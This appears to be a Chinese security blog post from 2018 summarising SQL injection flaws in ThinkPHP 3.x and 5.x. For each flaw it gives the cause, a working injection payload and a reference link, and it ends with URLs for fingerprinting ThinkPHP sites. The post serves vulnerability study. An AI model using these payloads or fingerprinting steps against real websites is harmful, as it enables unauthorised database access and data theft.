<!DOCTYPE html>
<html lang="zh-CN">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="mjy6">


    <meta name="subtitle" content="一个脚本小子的挣扎">



    <meta name="keywords" content="网络安全">


<title>代码审计 | Thinkphp3.x/5.x框架审计总结 | 安全之路</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 7.0.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">mjy6&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">mjy6&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">代码审计 | Thinkphp3.x/5.x框架审计总结</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">mjy6</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">十月 18, 2018&nbsp;&nbsp;8:15:41</a>
                        </span>
                    
                    
                </div>
            
        </header>

        <div class="post-content">
            <blockquote>
<p>今天重新返回去看了下前几天复现几个TP框架的洞,总结总结。</p>
</blockquote>
<hr>
<p>今天重新返回去复现TP的洞,发现5.0.10那处盲注复现不了,经过调试发现是自己例子写错大小写导致绕过了系统的判断才产生漏洞 尴尬啊。原文:<br><a target="_blank" rel="noopener" href="https://p0rz9.github.io/2018/09/25/thinkphp5.0.10%E5%87%BD%E6%95%B0%E8%BF%87%E6%BB%A4%E4%B8%8D%E5%85%A8%E5%AF%BC%E8%87%B4%E4%B8%80%E5%A4%84%E7%9B%B2%E6%B3%A8/">https://p0rz9.github.io/2018/09/25/thinkphp5.0.10函数过滤不全导致一处盲注</a><br>然后自己绕不过<br><img src="http://static.zybuluo.com/chhyx/m6dz5oxp4xm30v76ioiizzrc/image_1cq3l6los507172715g41e5lirp5f.png" alt="image_1cq3l6los507172715g41e5lirp5f.png-45.9kB"><br>有绕过的大佬欢迎交流。</p>
<p>##<strong>版本:3.x</strong></p>
<p><strong>tp3.2.3 bind 注入</strong><br><strong>漏洞成因:</strong><code>当where条件可控时,parseWhereItem()的inc操作直接拼接可控值$val造成注入</code><br><strong>payload:</strong><code>id[]=bind&amp;id[]=0 and (updatexml(1,concat(0x7e,(select%20user()),0x7e),1))</code><br><strong>参考链接:</strong><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2812#toc-4">ThinkPHP-漏洞分析集合</a></p>
<p><strong>tp&lt;&#x3D;3.2.4 order by注入</strong><br><strong>漏洞成因:</strong><code>parseOrder()处理函数直接拼接传进来的字符串</code><br><img src="http://static.zybuluo.com/chhyx/znarexfdy7bxxmqjevut7nen/image_1cq3i0btnbs51tsp139t1q61dhn1p.png" alt="image_1cq3i0btnbs51tsp139t1q61dhn1p.png-40.8kB"><br><strong>payload:</strong><br><strong>参考链接:</strong><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2812#toc-4">ThinkPHP-漏洞分析集合</a></p>
<p><strong>ThinkPHP 3.2.3 find_select_delete注入</strong><br><strong>成因:</strong><code>$this-&gt;_parseOptions($options);方法进行了参数合并又没有二次校验导致的注入</code><br><strong>payload:</strong><code>?id[where]=id = 1 and updatexml(0,concat(0xa,user()),0)</code><br><strong>参考链接:</strong><a target="_blank" rel="noopener" href="https://p0rz9.github.io/2018/09/29/Thinkphp3.2%20find_delete_selete%E6%B3%A8%E5%85%A5%E5%88%86%E6%9E%90/">https://p0rz9.github.io/2018/09/29/Thinkphp3.2_find_delete_selete注入分析&#x2F;</a></p>
<p>##<strong>版本:5.x</strong><br><strong>1.thinkphp5.0.9 鸡肋SQL注入(PDo预处理)+信息泄露</strong><br><strong>成因:</strong><code>debug开启造成信息泄露+parseWhereItem()的in操作对$value无过滤且直接拼接</code><br><strong>payload:</strong><code>?id[0,updatexml(0,concat(0xa,user()),0)]=1</code><br><strong>参考链接:</strong><a target="_blank" rel="noopener" href="https://p0rz9.github.io/2018/09/19/ThinkPHP%E8%AE%BE%E8%AE%A1%E7%BC%BA%E9%99%B7%E6%B3%84%E9%9C%B2%E8%B4%A6%E6%88%B7%E5%AF%86%E7%A0%81+%E9%B8%A1%E8%82%8Bsql%E6%B3%A8%E5%85%A5/">https://p0rz9.github.io/2018/09/19/ThinkPHP设计缺陷泄露账户密码+鸡肋sql注入</a></p>
<p><strong>2.thinkphp5.0.10 filterExp过滤不全导致注入</strong><br><strong>成因:</strong><code>助手函数input默认调用的filterExp()函数过滤不全导致注入</code><br><strong>payload:</strong><code>user[0]=not like&amp;user[1][0]=aaa&amp;user[1][8]=bbb&amp;user[2]=) and 1=2 union select 1,user(),3 from user--</code><br><strong>参考链接:</strong><a target="_blank" rel="noopener" href="http://static.zybuluo.com/chhyx/81w6j9hqbr86tcsy5wpouq26/image_1cq3gbi4g1v0n1tqc15jf12191o80p.png">https://p0rz9.github.io/2018/09/25/thinkphp5.0.10函数过滤不全导致注入</a></p>
<p><strong>3.thinkphp5.0.14&#x2F;15   insert&#x2F;update注入(鸡肋)</strong><br><strong>成因:</strong><code>若传入参数为inc,parseData()函数会将将$val[1]与$val[2]拼接直接拼接导致注入</code><br><strong>payload:</strong><code>?name[0]=inc&amp;name[1]=updatexml(1,concat(0x7,user(),0x7e),1)&amp;name[2]=1</code><br><strong>参考链接:</strong><a target="_blank" rel="noopener" href="https://p0rz9.github.io/2018/09/15/ThinkPHP%E6%A1%86%E6%9E%B6%205.0.x%20sql%E6%B3%A8%E5%85%A5/">https://p0rz9.github.io/2018/09/15/ThinkPHP框架%205.0.x%20sql注入</a></p>
<p><strong>4.thinkphp5.x order by注入(鸡肋)</strong><br><strong>成因:</strong><code>与tp&lt;=3.2.4 order by注入成因类似</code><br><strong>payload:</strong><code>order[id</code>, 2) and updatexml(1,concat(0x3a,user()),1)– a][0]&#x3D;111&#96;<br><strong>参考链接:</strong><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2812#toc-4">ThinkPHP-漏洞分析集合</a></p>
<p><strong>识别基于THINKPHP框架的CMS:</strong></p>
<pre><code>http://xxxx/index.php?c=4e5e5d7364f443e28fbf0d3ae744a59a
http://xxxx/4e5e5d7364f443e28fbf0d3ae744a59a
http://xxxxx/ThinkPHP/logo.png
http://xxxx/ThinkPHP/LICENSE.txt
</code></pre>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>mjy6</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="http://example.com/2018/10/18/Thinkphp3.x_5.x%E6%A1%86%E6%9E%B6%E5%AE%A1%E8%AE%A1%E6%80%BB%E7%BB%93/">http://example.com/2018/10/18/Thinkphp3.x_5.x%E6%A1%86%E6%9E%B6%E5%AE%A1%E8%AE%A1%E6%80%BB%E7%BB%93/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY</strong>?</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"># 代码审计</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2023/12/25/hello-world/">Hello World</a>
            
            
            <a class="next" rel="next" href="/2018/09/29/Thinkphp3.2%20find_delete_selete%E6%B3%A8%E5%85%A5%E5%88%86%E6%9E%90/">代码审计 | Thinkphp3.2 find_delete_selete注入分析</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© mjy6 | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>

</html>